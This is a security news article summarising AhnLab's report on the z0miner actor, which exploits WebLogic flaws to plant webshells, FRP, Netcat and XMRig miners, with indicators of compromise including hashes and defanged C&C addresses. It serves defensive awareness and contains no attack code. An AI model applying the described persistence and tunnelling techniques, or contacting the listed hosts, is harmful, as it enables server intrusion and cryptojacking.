Hackers Hijacking Web Server To Deploy z0Miner Malware


The threat actor, who goes by the name “z0miner,” has been found to be attacking Korean WebLogic servers to distribute malware like miners, network tools, and scripts for attacking further.

This threat actor has a history of attacking vulnerable servers such as Atlassian Confluence, Apache ActiveMQ, Log4j, and many more.

Researchers at Tencent first discovered this threat actor in 2020. The “z0miner” threat actor is well-known for exploiting CVE-2020-14882 and CVE-2020-14883 against Oracle WebLogic servers.

However, according to ASEC researchers, their latest targets were Korean WebLogic servers, and several traces of tools such as FRP (Fast Reverse Proxy), NetCat, and AnyDesk were present.

Document

Integrate ANY.RUN in your company for Effective Malware Analysis

Malware analysis can be fast and simple. Just let us show you the way to:

  • Interact with malware safely
  • Set up virtual machine in Linux and all Windows OS versions
  • Work in a team
  • Get detailed reports with maximum data
  • If you want to test all these features now with completely free access to the sandbox: ..

Technical Analysis

According to reports shared with Cyber Security News, the threat actor exploited these Korean WebLogic servers due to poor security configuration and the widespread exposure of server information. 

The threat actor could discover the Tomcat version and server version of these servers.

Once this information was gathered, the threat actors used several tools, such as WebShell, FRP, and NetCat, to further exploit it.

Hackers Hijacking Web Server To Deploy z0Miner Malware
Exploited servers (Source: AhnLab)

Exploitation Methods

WebShell

The threat actor utilized the WebLogic vulnerability CVE-2020-14882 to upload a JSP webshell on the vulnerable system, enabling persistence and control over the system.

Three webshells, such as JSP file Browser, Shack2, and Behinder, were deployed. Moreover, none of these webshells were detected by anti-malware products.

Hackers Hijacking Web Server To Deploy z0Miner Malware
Webshell (Source: AhnLab)

Fast Reverse Proxy (FRP)

This tool was used for RDP (Remote Desktop Communication) protocol communication. Additionally, both the default frpc as well as a customized version were used.

The default frpc loads a settings file in the *.INI form and attempts the connection, while the customized frpc can be run without using an individual file.

Hackers Hijacking Web Server To Deploy z0Miner Malware
FRP Download (Source: AhnLab)

NetCat

Netcat is capable of reading and writing data over a network connection and has been found in many webshells.

The tools provide a remote shell feature, which allows them to bypass the firewall and get control over the targeted system.

Hackers Hijacking Web Server To Deploy z0Miner Malware
Netcat implemented as “userinit.exe” ((Source: AhnLab)

Miner (XMRig)

The versions of XMRig used by z0miner are different for Windows and Linux. XMRig 6.18.0 was used in Windows, and 6.18.1 was used for Linux.

To establish persistence with Miner, the threat actor used the Task Scheduler (schtasks) or WMI’s event filter and configured it to read a PowerShell script from a certain Pastebin address and execute it.

Hackers Hijacking Web Server To Deploy z0Miner Malware
XMRig (Source: AhnLab)

The threat actor also used the Monero Wallet and Mining Pool address.

AnyDesk was also one of the tools used by the threat actor as part of the webshell but only used in cases where the Apache ActiveMQ vulnerability (CVE-2023-46604) is exploited.

Indicators Of Compromise

File Detection

  • HackTool/Win.Netcat (2022.10.18.03)
  • Win-Trojan/Miner3.Exp (2022.06.24.02)
  • Downloader/Shell.Miner.SC197168 (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Trojan/PowerShell.Miner (2024.02.27.01)
  • Trojan/Script.z0Miner.SC197169 (2024.02.27.01)
  • Trojan/Win.FRP (2024.02.27.01)
  • Trojan/Shell.Miner.SC197170 (2024.02.27.01)
  • Trojan/Shell.Miner.SC197171 (2024.02.27.01)
  • Trojan/Shell.Agent.SC197172 (2024.02.27.01)
  • Downloader/Shell.Miner.SC197173 (2024.02.27.01)
  • WebShell/JSP.Generic.S1866 (2024.02.27.00)
  • Linux/CoinMiner.Gen2 (2022.11.24.02)
  • WebShell/JSP.FileBrowser.SC197174 (2024.02.27.01)
  • WebShell/JSP.Generic.S1957 (2024.02.27.00)
  • Trojan/Shell.Agent.SC197175 (2024.02.27.03)
  • Downloader/PowerShell.Miner (2024.02.27.03)
  • CoinMiner/Shell.Generic.S2078 (2024.02.27.00)
  • Downloader/PowerShell.Miner.SC197176 (2024.02.27.01)

MD5

  • 523613a7b9dfa398cbd5ebd2dd0f4f38 : userinit.exe(Netcat)
  • 2a0d26b8b02bb2d17994d2a9a38d61db : x.rar(XMRig, exe)
  • 4cd78b6cc1e3d3dde3e47852056f78ad : al.txt
  • 085c68576c60ca0361b9778268b0b3b9 : (config.json)
  • b6aaced82b7c663a5922ce298831885a : (config.json)
  • 7b2793902d106ba11d3369dff5799aa5 : cpu.ps1
  • ad33f965d406c8f328bd71aff654ec4c : frpc.ini
  • 7e5cc9d086c93fa1af1d3453b3c6946e : svcho.exe(frpc)
  • e60d8a3f2190d78e94c7b952b72916ac : frp5.exe
  • 8434de0c058abb27c928a10b3ab79ff8 : l.txt
  • 90b74cdc4b7763c6b25fdcd27f26377f : l.txt
  • 83e163afd5993320882452453c214932 : lcpu.txt
  • a0766ad196626f28919c904d2ced6c85 : ll.txt
  • 903fce58cb4bfc39786c77fe0b5d9486 : pan.rar(Shack2 WebShell)
  • c2fb307aee872df475a7345d641d72da : s.rar(XMRig, ELF)
  • 88d49dad824344b8d6103c96b4f81d19 : session.rar(Zubin WebShell)
  • efc2a705c858ed08a76d20a8f5a11b1b : shell.rar(Behinder WebShell)
  • 98e167e7c2999cbea30cc9342e944a4c : solr.sh
  • 575575f5b6f9c4f7149ed6d86fb16c0f : st.ps1
  • 547c02a9b01194a0fcbfef79aaa52e38 : st2.txt
  • fd0fe2a3d154c412be6932e75a9a5ca1 : stt.txt

C&C URL

(Korean web servers exploited and used as download servers are shown only on TIP.)

  • 107.180.100[.]247:88
  • 15.235.22[.]212:5690
  • 15.235.22[.]213:59240

With Perimeter81 malware protection, you can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits. All are incredibly harmful and can wreak havoc on your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.





Source link